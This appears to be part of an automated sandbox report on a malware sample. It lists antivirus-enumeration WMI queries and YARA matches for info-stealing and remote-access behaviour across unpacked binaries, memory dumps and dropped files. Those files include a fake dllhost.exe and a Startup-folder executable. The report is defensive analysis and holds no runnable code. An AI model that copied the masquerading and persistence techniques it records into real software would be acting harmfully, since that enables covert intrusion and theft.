Source: C:\Users\user\AppData\Roaming\dllhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\dllhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\dllhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: virus.exe.bin.exe, type: SAMPLE
Source: Yara match File source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3915823242.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: virus.exe.bin.exe PID: 752, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Hyra.exe PID: 1952, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: final.exe PID: 3320, type: MEMORYSTR
Source: Yara match File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED

Remote Access Functionality

Source: Yara match File source: virus.exe.bin.exe, type: SAMPLE
Source: Yara match File source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3915823242.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: virus.exe.bin.exe PID: 752, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Hyra.exe PID: 1952, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: final.exe PID: 3320, type: MEMORYSTR
Source: Yara match File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED